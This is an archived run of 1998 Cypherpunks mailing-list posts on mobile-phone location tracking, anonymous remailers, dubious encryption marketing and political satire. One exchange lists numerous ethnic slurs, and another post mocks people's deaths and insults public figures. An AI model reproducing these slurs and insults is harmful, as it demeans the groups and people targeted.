Eric Murray  Chief Security Scientist  N*Able Technologies  www.nabletech.com
(email:  ericm  at  lne.com   or   nabletech.com)          PGP keyid:E03F65E5





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kay Ping <kping@nym.alias.net>
Date: Fri, 2 Jan 1998 18:28:20 +0800
To: cypherpunks@toad.com
Subject: Re: Location Escrow anyone ?
Message-ID: <19980102101945.10999.qmail@nym.alias.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

>>ZURICH (December 28, 1997 4:12 p.m. EST http://www.nando.net) - Swiss
>>police have secretly tracked the whereabouts of mobile phone users via a
>>telephone company computer that records billions of movements going back
>>more than half a year, a Sunday newspaper reported.
>
>Don't be fooled that this is a swiss only problem. It's being done here in
>Amerika right now.

The FCC has issued a ruling that will require all cellular telephone
carriers to provide location information on all 911 calls. By the year
2001, this location information is to provide 125 metres of accuracy 67%
of the time.

Helping emergency services locate 911 callers is a great excuse for 
installing  a cellular location system. Even better than the excuses they 
gave for eavesdropping-ready digital switches and limits on encryption.

- --------------
Kay Ping
nop 'til you drop

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3ia
Charset: cp850

iQEQAwUBNKyXURHPAso8Qp7tAQH+LgfRATtByYG8nB+gbqvrJ96SGdhRPhXUWnzl
7gHW9+nr6lNQxgbFnU1cpOKR76Y0MEj80ls9n9DojlQuIKJD1RHXc7GQA3k0IVZU
yXYyy8Z89dvVUxprVjt0MylxY1+fP7pGLVcViz9jZ/5cgZSgUdRKQNAWpp9g/Ww4
8GYSXGYGrC8hCPoD+i/cjwC3FEQVD+GzSmXnadK8a2a+stiehN1bw/p61+vizxQZ
C9YG1AS54Ttzh/jUjnHmRwNYtY4J0i9zUXxElbwj8PcOW9GewTPw+/6fiQ63c35Q
2pCi2q9dk1jFtgIXfrBusSkKS9wP0yYmtLG6lc52YtC6MNE=
=+pHY
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mix <mixmaster@remail.obscura.com>
Date: Sat, 3 Jan 1998 02:53:58 +0800
To: cypherpunks@toad.com
Subject: Re: remailer
Message-ID: <199801021822.KAA05621@sirius.infonex.com>
MIME-Version: 1.0
Content-Type: text/plain



In a message dated 20:44 01/01/98 EST, you wrote:
 
> Check out <http://www.cyberpass.net/~winsock/>, for a remailer that will
> run on any winsock compatible connection.  I think there is a ftp site in
> europe.  I can't remember if it runs on NT, so check out the site.

Thanks for the help - I've tried the latest version with no luck. The docs state that it works under win95 now but there are still some issues with NT 4.0   Has anyone got this to work under NT?  I really want to give something back to the remailer/cypherpunk community and this is the only way I can think of.

If anyone has experience of the Winsock remailer and can help...







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Sat, 3 Jan 1998 03:39:14 +0800
To: cypherpunks@www.video-collage.com
Subject: Re: Meganet's Unbreakable Virtual Matrix Encryption Takes theMarket by Storm; Finally in 1998 Absolute Security...
In-Reply-To: <199801021435.IAA27120@manifold.algebra.com>
Message-ID: <v03102806b0d2f0f44bcd@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 6:35 AM -0800 1/2/98, Igor Chudov @ home wrote:
>CNN Custom News:

>          Repeat/Meganet's Unbreakable Virtual Matrix Encryption Takes
>          the Market by Storm; Finally in 1998 Absolute Security...
>
>          LA Times 02-JAN-98 LOS ANGELES--(BUSINESS WIRE)--Dec. 31,
>          1997--Finally Meganet's highly acclaimed unbreakable encryption,

>          All the great
>          computer minds in this country have had an opportunity to
>          dispel the bold claims of unbreakable encryption, yet none have.

All the great computer minds....

They laughed at Galileo, they laughed at Darwin, they laughed at Bozo the
Clown.

Jeesh.

--Tim May

The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim@mentat.com (Jim Gillogly)
Date: Sat, 3 Jan 1998 04:13:57 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Meganet's Unbreakable Virtual Matrix Encryption Takes the Market by Storm; Finally in 1998 Absolute Security...
Message-ID: <9801022007.AA03484@mentat.com>
MIME-Version: 1.0
Content-Type: text/plain



IChudov relays from CNN Custom  News:
>           Repeat/Meganet's Unbreakable Virtual Matrix Encryption Takes
>           the Market by Storm; Finally in 1998 Absolute Security...

That reminds me... in PR Newswire on 16 Dec 1997 it was reported that
IBM had endorsed Meganet's VME, and recommended that NIST replace the
DES standard with it (presumably in the AES bake-off).  This was
humorous enough that I thought it worth sharing with IBM -- I
ingenously asked them whether it was true, and, if so, how they came to
the conclusion that it was a useful product.  They responded:

       I would like to apologize for the length of time it took
       to reply to your message. I had to make a few phonecalls
       and had to wait for someone to get back to me. I spoke with
       a Cryptography Specialist and she informed me that IBM
       has, in fact, not tested their product and therefore has not
       endorsed it. IBM has no further comment regarding the report.

       I hope this helps.

       Thank you for using askIBM.

    George Lavasidis (ASKIBM@vnet.ibm.com)
    IBM Internet Support Group
    1-800-IBM-4YOU

I, too, have no further comment.

	Jim Gillogly
	Hevensday, 11 Afteryule S.R. 1998, 20:11
	12.19.4.14.11, 8 Chuen 9 Kankin, Third Lord of Night





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Bradley <paul@fatmans.demon.co.uk>
Date: Sun, 4 Jan 1998 21:49:07 +0800
To: Mikhael Frieden <mikhaelf@mindspring.com>
Subject: Re: Freedom Forum report on the State of the First Amendment
In-Reply-To: <3.0.16.19980101165908.0c4f464c@pop.mindspring.com>
Message-ID: <Pine.LNX.3.91.980102132949.1539B-100000@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain




> >No, acts of law which require employers not to discriminate against 
> >niggers, wops, kikes or greezers, or any other ratial group infringe 
> >basic rights of association, I personally have no racist prejudices, but 
> >recognise the freedom of others to be as bigotted as they care to be.
> 
>         Does that include the krauts, micks, limeys, frogs as well as the
> canucks and pea soup eaters? The polacks, chinks and dagos? The Wogs too? 

Indeed it does.

>         Which reminds me. We never did get a good one for the Russians. Any
> nominations? 

Reds is always a good one, and especially ignorant and offensive since 
the communist tyranny was replaced with a "democratic" one. Can`t think 
of any others offhand.

        Datacomms Technologies data security
       Paul Bradley, Paul@fatmans.demon.co.uk
  Paul@crypto.uk.eu.org, Paul@cryptography.uk.eu.org    
       Http://www.cryptography.home.ml.org/
      Email for PGP public key, ID: FC76DA85
     "Don`t forget to mount a scratch monkey"






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pearson Shane <Shane.Pearson@tafensw.edu.au>
Date: Fri, 2 Jan 1998 11:59:44 +0800
To: "'cypherpunks@toad.com>
Subject: RE: Location Escrow anyone ?
Message-ID: <c=AU%a=TELEMEMO_%p=TAFENSW%l=ISF10-980102034537Z-4222@ixf2m1.isd.tafensw.edu.au>
MIME-Version: 1.0
Content-Type: text/plain



Hello all,

>> "Swisscom has stored data on the movements of more than a million mobile
>> phone users. It can call up the location of all its mobile subscribers down
>> to a few hundred meters and going back at least half a year," the paper
>> reported.
>
>They probably say a few hundred meters so the people don't feel
>their privacy is too ridiculously invaded / soften the blow.
>
>If this is a GSM network then I think they can probably pinpoint
>your location down to 2 possible locations within a few meters
>due to the digital timing involved with the very precise spread
>spectrum radio. Or maybe your actual location within a meter or 2.
>
>I have heard of digital mobile phones that have a feature in their test/diag
>mode that displays the distance to the current base station in meters,
>and also displays info of a second base station that it would most likely
>switch to when moving out of the current cell.
>Even if the telco only had the distance info to your phone within a meter
>from 2 of their base stations, they could calculate where you are if need
>be to 2 possible locations within meters.
>Surely though they would have the capability of recording distance info
>from 3 base stations, pin pointing you exactly during a call or the exact
>spot your phone requested a cell change.
>
>And during a call, if need be, they could probably plot your position at
>around 10,000 samples per second.	:) Though for them to be keeping
>this much info on you, you are obviously being investigated.
>
>Isn't it ironic that people who use GSM for it's "security" can have this
>much info of their whereabouts known to big brother/whoever?
>Not to mention their actual conversation.
>
>Imagine Mr.Drug Dealer turns up to court and watches as the jury is
>presented with a floorplan on screen and an animated pinpoint of his
>phones position while a recording of his conversation is played in sync?
>
>The world just about, has no idea!
>To say big brother is watching is a gross understatement.	:)
>
>He's gunna find out who's naughty and nice.
>
>Bye for now.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lance Cottrell <loki@infonex.com>
Date: Sat, 3 Jan 1998 09:19:12 +0800
To: wayne clerke <cypherpunks@cyberpass.net
Subject: Re: FCPUNX:Anonymous IRC (was 'Cypherpunks IRC Christmas EveParty')
In-Reply-To: <199712312112.QAA07345@beast.brainlink.com>
Message-ID: <v0310280ab0d33f12c165@[206.170.115.5]>
MIME-Version: 1.0
Content-Type: text/plain



At 1:32 AM +0000 12/31/97, wayne clerke wrote:
>On Tuesday, December 30, 1997 7:56 AM, Mark Hedges
>[SMTP:hedges@rigel.cyberpass.net] wrote:
>>
>>
>> We found IRC users to be so involved in petty information wars --
>> ping floods, malicious prank hacking, and the like -- that we directed
>> policy against use of IRC from the anonymous shell accounts at CyberPass.
>>
>> If IRC users weren't so easily lulled by the tempation to crash a server
>> or run malicious bots or just plain irritate other people for fun, and
>> if they would gang up and kick out people who did that, then perhaps we'd
>> switch that back on.
>>
>> They were just too much overhead. Everyone else seems pretty nice, really,
>> as far as the system goes. They're all self-interested in keeping the
>> anonymous publishing and so on going, so the peace keeps itself.
>
>
>What's the reason behind the policy direction against the use of personal web
>proxies running in a (paid for) shell account?
>Seems like less risk than you already accept anyway. Something I've missed?
>

System load is the issue in this case. If a proxy becomes publicly known
the load it imposes on the system could quickly become gigantic. In
addition we found that people were setting up proxies on any old port,
sometimes causing all kinds of conflicts.

Our accounts are priced assuming light personal usage. Running servers on
our systems is negotiable.

	-Lance

----------------------------------------------------------
Lance Cottrell   loki@infonex.com
PGP 2.6 key available by finger or server.
http://www.infonex.com/~loki/

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Sat, 3 Jan 1998 09:21:05 +0800
To: Eric Cordian <cypherpunks@cyberpass.net
Subject: Re: [Humor] Kennedy's New Legislation
In-Reply-To: <199801030048.SAA02365@wire.insync.net>
Message-ID: <v03102809b0d33f81c06a@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 4:48 PM -0800 1/2/98, Eric Cordian wrote:

>Newsgroups: alt.true-crime
>Subject: Kennedy Death Spurs Legislative Initiative
>Date: Fri, 02 Jan 1998 22:44:03 GMT
>Message-ID: <68jrg6$eil@dfw-ixnews6.ix.netcom.com>
>
>BOSTON, Mass. (AP) - Sen. Ted Kennedy announced here today that he
>will introduce a bill limiting access to skis and ski poles. The
>"Winter Sports Safety Bill" is believed to be a reaction to the recent
>death of the Senator's nephew Michael Kennedy in a skiing accident.
...

And on a more serious note, one thing this affair shows is that once again,
the Kennedy clan (KC)  lives by different rules. Whether it's Edward
Kennedy getting off in the Mary Jo Kopechne case, when any of us would have
likely been charged with a) drunk driving, b) leaving the scene, c) lying
in an investigation, or whether it's this very same Michael Kennedy getting
off with his underage babysitter....

(Why was he not charged with statutory rape? Because the KC got to the
babysitter and, it is widely reported, bought her off. So why was the
_criminal_ charge of statutory rape not still applied? Because the
babysitter wouldn't testify.)

And so on, over and over again.

Wanna bet that if I was on the hill in Aspen horsing around playing ski
football and behaving like a drunken lout with a bunch of other people the
ski patrol would whistle us down and tell us to knock it off?

Justice has always been for sale in America. But with tens of thousands of
new laws, the effects are just becoming more obvious.

I say the death of Michael Kennedy, as with the death of Princess Di, was
just an example of evolution in action. (An imperfect example, of course,
as Di had already been bred.)

Regrettably, this satire about the Safe Slopes and Children's Protection
Act of 1998 is on the mark. Clueless bimbos like Swinestein, who's never
passed up a chance to make another law, will be jockeying for regulation of
the ski slopes...even as the Kennedy Clan remains exempt.

--Tim May


The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Cordian <emc@wire.insync.net>
Date: Sat, 3 Jan 1998 08:51:47 +0800
To: cypherpunks@cyberpass.net
Subject: [Humor] Kennedy's New Legislation
Message-ID: <199801030048.SAA02365@wire.insync.net>
MIME-Version: 1.0
Content-Type: text/plain



Something amusing from alt.true-crime with definite crypto parallels
to certain Swinestein and Freeh initiatives.  It is rare to find
material that rises to the Toto level of comedy on Usenet.
 
-----
 
Newsgroups: alt.true-crime
Subject: Kennedy Death Spurs Legislative Initiative
Date: Fri, 02 Jan 1998 22:44:03 GMT
Message-ID: <68jrg6$eil@dfw-ixnews6.ix.netcom.com>
 
BOSTON, Mass. (AP) - Sen. Ted Kennedy announced here today that he
will introduce a bill limiting access to skis and ski poles. The
"Winter Sports Safety Bill" is believed to be a reaction to the recent
death of the Senator's nephew Michael Kennedy in a skiing accident.
 
"When skis were invented, they were made out of wood," Kennedy said.
"Today's skis are simply to powerful and dangerous to be in the hands
of people. There is no constitutional right to skiing. We feel that
people will have to sacrifice some of their freedoms for the
protection of society as a whole."
 
One provision will license all dealers in skis. These licenses will
involve fingerprinting, background checks, body cavity searches, and
photographs of anybody wishing to be in the business of selling skis
and ski poles.
 
Another section of the bill bans any ski pole under 36" in length and
any ski which is not at least 48" in length.
 
The bill also addresses ski wax. Studies have shown that some waxes
actually make the skis go faster, creating a greater danger of death
to the skier. Skiers also use the faster skis to outrun the ski
patrol, which is not an acceptable practice.
 
A five day waiting period will be required for all ski and ski pole
sales.  People will be required to provide their social security
number and floor plan of their homes before being permitted to
purchase skis.
 
"There are simply too many people getting excited about skiing. Easy
access to skis is the major reason people get killed on those things.
They should have to wait before they can pick up their skis. I am sure
that this 'cooling off period' will save lives," Kennedy said.
 
Another bill has been introduced that will ban 'ski carrying devices'
on tops of cars that have a capacity of greater than ten skis.
 
"There is simply no reason why anybody needs more than ten skis. You
can't ski on more than two at the same time. People with more than ten
skis are simply up to no good," said Kennedy.
 
Statistics quoted by the Center for Disease Control show that skiing
was second only to drowning as the leading cause of death for people
close to the Kennedy family.
 
OTHER RELATED STORIES:
 
  - Ted Kennedy Denies Driving Michael to Aspen.
  - Study Links Skiing to Suicides.
  - Clinton Calls for Restrictions on "Cop Killer" Ski Poles.
  - Washington DC to Buy Back Skis for $2 Each.
  - Dianne Feinstein Vows Defeat for the National Skiing Association.

--
Eric Michael Cordian 0+
O:.T:.O:. Mathematical Munitions Division
"Do What Thou Wilt Shall Be The Whole Of The Law"
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sat, 3 Jan 1998 10:14:55 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Creative Justice?... [CNN] (fwd)
Message-ID: <199801030233.UAA16300@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:
>From ravage@ssz.com Fri Jan  2 20:33:21 1998
From: Jim Choate <ravage@ssz.com>
Message-Id: <199801030233.UAA16279@einstein.ssz.com>
Subject: Creative Justice?... [CNN]
To: users@ssz.com (SSZ User Mail List)
Date: Fri, 2 Jan 1998 20:33:15 -0600 (CST)
Cc: friends@ssz.com (Ravage's Friends)
X-Mailer: ELM [version 2.4 PL23]
Content-Type: text
Content-Length: 2327      


Forwarded message:

>                  DRUNKEN DRIVER ORDERED CLOSER TO LIQUOR STORE
>                                        
>      graphic January 2, 1998
>      Web posted at: 8:39 p.m. EST (0139 GMT)
>      
>      CINCINNATI (Reuters) -- An Ohio judge has ordered a chronic drunken
>      driver to move within easy walking distance of a liquor store or
>      face jail.
>      
>      In a sentence meted out on New Year's Eve, Hillsboro Municipal Judge
>      James Hapner ordered Dennis Cayse to move within "easy walking
>      distance" -- defined as one-half mile or less -- of a liquor store
>      within 30 days or face a potential 1-1/2-year jail sentence for
>      drunken driving.
>      
>      It was Cayse's 18th conviction for drunken driving. He was also
>      sentenced to spend the first week of each of the next five years in
>      jail.
>      
>      The judge also directed that Cayse, who lost his license years ago
>      but continued to drink and drive, be handcuffed to the
>      passenger-side door or be seated with someone between him and the
>      driver anytime he travels.
>      
>      University of Cincinnati law professor Christo Lassiter said the
>      multiple sentence passed constitutional muster.
>      
>      "It appears to me that this sentence is neither unconstitutional nor
>      inappropriate," Lassiter told Reuters Friday. "It looks to me like
>      the judge felt that there was nothing he could do to keep the man
>      off the road except to make him move to where he could walk to buy
>      his booze."
>      
>      Hillsboro is a town of 6,000 just east of Cincinnati.
>      
>      "For as long as I have been associated with law enforcement, I have
>      never heard of such an unusual sentence. It's very squirrelly," said
>      Lt. Ronald Ward of the Highland County sheriff's office.
>      
>      "I have known Dennis Cayse a long time and I've never seen him sober
>      except when he was in jail," Ward said. "His lifetime record shows
>      that if he is not in jail, he's going to drink and drive."
>      
>      A spokeswoman for Mothers Against Drunk Driving denounced the
>      sentence, saying it was too lenient and sends the wrong public
>      message.
>      
>      Copyright 1998 Reuters Limited. All rights reserved.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alexandre Maret <amaret@infomaniak.ch>
Date: Sat, 3 Jan 1998 05:35:59 +0800
To: "'cypherpunks@toad.com>
Subject: Re: Location Escrow anyone ?
In-Reply-To: <c=AU%a=TELEMEMO_%p=TAFENSW%l=ISF10-980102034537Z-4222@ixf2m1.isd.tafensw.edu.au>
Message-ID: <34AD5B24.520C3851@infomaniak.ch>
MIME-Version: 1.0
Content-Type: text/plain



Pearson Shane wrote:
> 
> Hello all,
> 
> >> "Swisscom has stored data on the movements of more than a million mobile
> >> phone users. It can call up the location of all its mobile subscribers down
> >> to a few hundred meters and going back at least half a year," the paper
> >> reported.
> >
> >They probably say a few hundred meters so the people don't feel
> >their privacy is too ridiculously invaded / soften the blow.
> >
> >If this is a GSM network then I think they can probably pinpoint
> >your location down to 2 possible locations within a few meters
> >due to the digital timing involved with the very precise spread
> >spectrum radio. Or maybe your actual location within a meter or 2.

it is a GSM network, however, I doubt that they try to know more than
just the cell you're in... but you never know

[snip]
> >Imagine Mr.Drug Dealer turns up to court and watches as the jury is
> >presented with a floorplan on screen and an animated pinpoint of his
> >phones position while a recording of his conversation is played in sync?

yes... except that everybody but Mr.Drug Dealer use these mobile
phones (marketed under the name "Natel-D"). In switzerland, you can
buy GSM phones that works with prepaid cards. No trace, no name. The
location can still be pinpointed, but nobody know who's owning the
phone. This is called "Natel Easy" (what a name). It cost much more,
but depending on the business you're conducting, it's not a problem...

To conclude: everybody is watched, except Mr.DD...

> >The world just about, has no idea!
> >To say big brother is watching is a gross understatement.      :)

this is the problem in switzerland. When I first heard about this
story (and believe me, it's not the only one of that kind... it's
not even the worse), I tried to ask people around me to see what
they think about this, and I was amazed by their reaction. "There
is no problem, I'm not doing anything wrong." The media are
beginning to relate this kind of facts, but the people are still
incredibly naive.

One more thing we can say about this story: Switzerland's telecom
market is now free (since 1.1.98), and this story may give some
people (altough I'm not sure...) a reason to change their telco
(when possible).

Another fact of the 1997 year in switerland:

the largest retailer in switzerland (Migros http://www.migros.ch)
launched the M-Cumulus card. Each time you buy something by Migros,
you can present this card and get a 1% rebate (wow...) and you may
also get special rebate "tailored to your needs". But, to get this
card, you have to sign an agreement that allows Migros to record
what you buys. On the 20th november 1997, 1.6mio of citizen were
in the database (about 1/4th of the swiss population). When requesting
this card, you also provide the name and date of birth of each
in the household (you're not forced to do so, but 97% of the
M-Cumulus owners filled this information).
	(source: partially "Le Nouveau Quotidien", 20th nov 1997)

The federal government was supposed to issue a warning. If a warning
was issued, I may have been sleeping at that time...

Swiss Federal Data Protection Commissioner: http://www.edsb.ch/
mostly empty... not a word about these 2 stories. you see how the
swiss people are informed...

  alex





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Remo Pini <rp@rpini.com>
Date: Sat, 3 Jan 1998 06:56:30 +0800
To: cypherpunks@toad.com
Subject: Re: Location Escrow anyone ?
In-Reply-To: <c=AU%a=TELEMEMO_%p=TAFENSW%l=ISF10-980102034537Z-4222@ixf2m1.isd.tafensw.edu.au>
Message-ID: <3.0.2.32.19980102234524.00977740@linux>
MIME-Version: 1.0
Content-Type: text/plain



At 22:24 02.01.98 +0100, you wrote:
>
>Pearson Shane wrote:
>> 
>> Hello all,
>> 
>> >> "Swisscom has stored data on the movements of more than a million mobile
>> >> phone users. It can call up the location of all its mobile
subscribers down
>> >> to a few hundred meters and going back at least half a year," the paper
>> >> reported.
>> >
>> >They probably say a few hundred meters so the people don't feel
>> >their privacy is too ridiculously invaded / soften the blow.
>> >
>> >If this is a GSM network then I think they can probably pinpoint
>> >your location down to 2 possible locations within a few meters
>> >due to the digital timing involved with the very precise spread
>> >spectrum radio. Or maybe your actual location within a meter or 2.
>
>it is a GSM network, however, I doubt that they try to know more than
>just the cell you're in... but you never know

They can't really (the cell relay equipment is not up to the task).

>> >Imagine Mr.Drug Dealer turns up to court and watches as the jury is
>> >presented with a floorplan on screen and an animated pinpoint of his
>> >phones position while a recording of his conversation is played in sync?
>
>yes... except that everybody but Mr.Drug Dealer use these mobile
>phones (marketed under the name "Natel-D"). In switzerland, you can
>buy GSM phones that works with prepaid cards. No trace, no name. The
>location can still be pinpointed, but nobody know who's owning the
>phone. This is called "Natel Easy" (what a name). It cost much more,
>but depending on the business you're conducting, it's not a problem...
>
>To conclude: everybody is watched, except Mr.DD...
>
>> >The world just about, has no idea!
>> >To say big brother is watching is a gross understatement.      :)
>
>this is the problem in switzerland. When I first heard about this
>story (and believe me, it's not the only one of that kind... it's
>not even the worse), I tried to ask people around me to see what
>they think about this, and I was amazed by their reaction. "There
>is no problem, I'm not doing anything wrong." The media are
>beginning to relate this kind of facts, but the people are still
>incredibly naive.

You should have asked me instead :), I'm a bit more paranoid than most.
(Yes, I most certainly don't have a Cumulus card and I have a Natel D-Easy
for 
fun.)

>One more thing we can say about this story: Switzerland's telecom
>market is now free (since 1.1.98), and this story may give some
>people (altough I'm not sure...) a reason to change their telco
>(when possible).

Until somewhen in 1999 you can only do international calls through alternate
carriers (only Swisscom has access to the home so far, unless these cable
operators
really get serious, which they won't, because Swisscom owns more then 30%
of their
stock) and you have to prepend a 5 digit number to do a call until autumn
(I don't think
people without a pbx that can be programmed to automatically do that will
switch carriers).

>Another fact of the 1997 year in switerland:
>
>the largest retailer in switzerland (Migros http://www.migros.ch)
>launched the M-Cumulus card. Each time you buy something by Migros,
>you can present this card and get a 1% rebate (wow...) and you may
>also get special rebate "tailored to your needs". But, to get this
>card, you have to sign an agreement that allows Migros to record
>what you buys. On the 20th november 1997, 1.6mio of citizen were
>in the database (about 1/4th of the swiss population). When requesting
>this card, you also provide the name and date of birth of each
>in the household (you're not forced to do so, but 97% of the
>M-Cumulus owners filled this information).
>	(source: partially "Le Nouveau Quotidien", 20th nov 1997)

It is a bit worrying, but on the other hand, I don't consider my shopping
list a
very personal thing, after all, hardly anyone (except Monty Python) gets
killed by
a banana.

>The federal government was supposed to issue a warning. If a warning
>was issued, I may have been sleeping at that time...

Well, I guess everybody was...

>Swiss Federal Data Protection Commissioner: http://www.edsb.ch/
>mostly empty... not a word about these 2 stories. you see how the
>swiss people are informed...

Now this guy (Odilo Guntern) seems to have no clue about anything...

Wanna get more paranoid? Some companies log all Internet traffic of their
employees
that passes through their proxy (which you have to use for anything to
work) for
some weeks (Weren't you the one chatting on #really-naughty-bits for more
than 1 
hour on Monday??).
And of course, phonenumbers you call in your company are logged, too.

See you,
Remo
-----------------------------------------------------
Fate favors the prepared mind. (from "Under Siege 3")
-----------------------------------------------------
Remo Pini                         T: +41  1 350 28 88
Pini Computer Trading             N: +41 79 216 15 51
http://www.rpini.com/                 E: rp@rpini.com
key: http://www.rpini.com/crypto/remopini.asc        
-----------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Patrick May <pjm@spe.com>
Date: Sun, 4 Jan 1998 06:01:44 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Time to Pay the Piper
In-Reply-To: <19980102.081442.attila@hun.org>
Message-ID: <1669-Sat03Jan1998030310-0800-Patrick May <pjm@spe.com>
MIME-Version: 1.0
Content-Type: text/plain



Attila T. Hun writes:
[ . . . ]
 > > At 05:15 PM 12/21/1997 +0000, Attila T. Hun wrote:
 > >>    there is only one solution to organizations like M$ 
 > >>    which are operated without ethics: treat them to the
 > >>    pleasures of not only the antitrust laws but the 
 > >>    exquisite delights of RICO.
[ . . . ]
 >     1)  when a true market monopoly exists, society _is_
 >         entitled to intervene. I wrote my Harvard thesis on
 >         antitrust and the effect on society of a monopoly,

     Ah, that explains why a bad-ass with a vocabulary would spout
such nonsense.  That little liberal arts college up the river from my
alma mater can corrupt even the finest minds.

     Rather than go down yet another libertarian v. statist debate
rathole, I'll just quote one of the more notorious (former) list
members by saying:  "I have a solution for that."

     The federal government should immediately stop purchasing and
using Microsoft products.  No more monopoly, no court cases, no
delay.  Free market and technical solutions are always superior to
legal remedies.

Regards,

Patrick May
S P Engineering, Inc.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charlie Comsec <comsec@nym.alias.net>
Date: Sat, 3 Jan 1998 13:09:08 +0800
To: remailer-politics@server1.efga.org
Subject: Re: Remailer Logs (and Accountability)
In-Reply-To: <199712221346.OAA03091@basement.replay.com>
Message-ID: <19980103050003.766.qmail@nym.alias.net>
MIME-Version: 1.0
Content-Type: text/plain




-----BEGIN PGP SIGNED MESSAGE-----

usura@sabotage.org (Alex de Joode) wrote:

> : I suspect that if you polled remailer operators you'd find that some
> : keep logs and some don't.  I don't know about the Replay remailer.  Perhaps
> : Alex DeJoode (the operator of the Replay remailer) would care to comment.  Nor 
> : can logs necessarily positively identify you.  If kept, they would record when 
> : your message came in and when the post to usenet went out, but *PROBABLY* 
> : would not establish a conclusive link between the two.  Many remailers 
> : maintain a "reordering pool" where forwarded messages do not necessarily get 
> : sent out in the order they were received.
> 
> I donnot keep sendmaillogs, I donnot keep remailerlogs and I let 
> usenet do my mail2newslogging ... (They can ofcourse always supena 
> /dev/null, and then they get everything ..) 

Good.  No reason to tempt the Big Brother types (and wannabes).
BTW, people outside the remailer operator and user community seem to
assume that logs ARE kept.  I'm curious to know how often
individuals, organizations, and maybe even governments make requests
for your logs.

Oh ... also, if you don't mind, can you uuencode your /dev/null and
send it to me? <g>

> The "reordering pool" is 
> always a minimum of 5 messages so people can opt for how long their 
> message wil be 'stashed' at replay. (use 'Latency: +00:00' for zero latecy).

Is that default reordering pool size the same for Type I and Type II
messages?

Perhaps someone can double-check my math on this.  Assuming
equally-sized messages that are otherwise indistinguishable, and a
reordering pool size of five, then the odds of matching up an
encrypted incoming message with an encrypted outgoing message are
one in five.

Thus a message chained through n remailers (each having a reordering
pool size of 5) would be diffused among 5^n possible messages to
thwart potential traffic analysis.

What I'm unclear on is how setting a Latency:  flag affects the
diffusion of the output.  Is that lattency IN ADDITION to the pool
size of five, or does Latency:  +00:00 bypass the reordering process
altogether?

My main concern is the security of chained reply blocks which are
more vulnerable to attack than normal anonymous messages.  A single
anonymous message can only be traced BACKWARDS after it's been
received.  An anonymous reply, OTOH, could, theoretically, be
"walked" through each remailer in the chain until the identity of
the recipient was discovered.  While that process would require
convincing each remailer operator in the chain to cooperate, it's a
lot more feasible than tracing a message backwards to its source.
(Yes, I know about posting to a public message pool, such as a.a.m,
but NG posting seems to be rather unreliable lately.)

- ----
Finger <comsec@nym.alias.net> for PGP public key (Key ID=19BE8B0D)


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBNK2wqwbp0h8ZvosNAQFcpwf9GzP5jGSURrVZXu3omQXx9+de1aOHZ+Uk
azgpHRZwStL86ztv1U5RcO7TRQ7gNgEd0+8V+z/wJei82f5zsQPCWVITjHBnUBKL
sbGEFTtlkLfehXgF6oRk4xYzngxekYYFXm3UqZFKf/maQvMCRXbXSfTpb0CejpfQ
01PQGmXrShjdiYO8Uj+UoXzEEyAU383ssnJmsDBbnMvilM3aE5f0GXG/dx3QSvQi
CfRzPFpcgfM4kojv8CxH5xfCvCWzKNgi8lnGuMjNwYApuGrYVtJSReq+OcAe9GeQ
O2e+R9emHWiZHO16asfjnx6Eie7BylGrBRCLPWAAxPo16AtGjhJimw==
=HRSR
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Sheriff <sheriff@speakeasy.org>
Date: Sat, 3 Jan 1998 19:46:32 +0800
To: cypherpunks@toad.com
Subject: Re: Location Escrow anyone ?
In-Reply-To: <34AD5B24.520C3851@infomaniak.ch>
Message-ID: <l03020905b0d3c2baa5de@[209.130.134.27]>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

>>it is a GSM network, however, I doubt that they try to know more than
>>just the cell you're in... but you never know
>
>They can't really (the cell relay equipment is not up to the task).

What about the new digital phones?

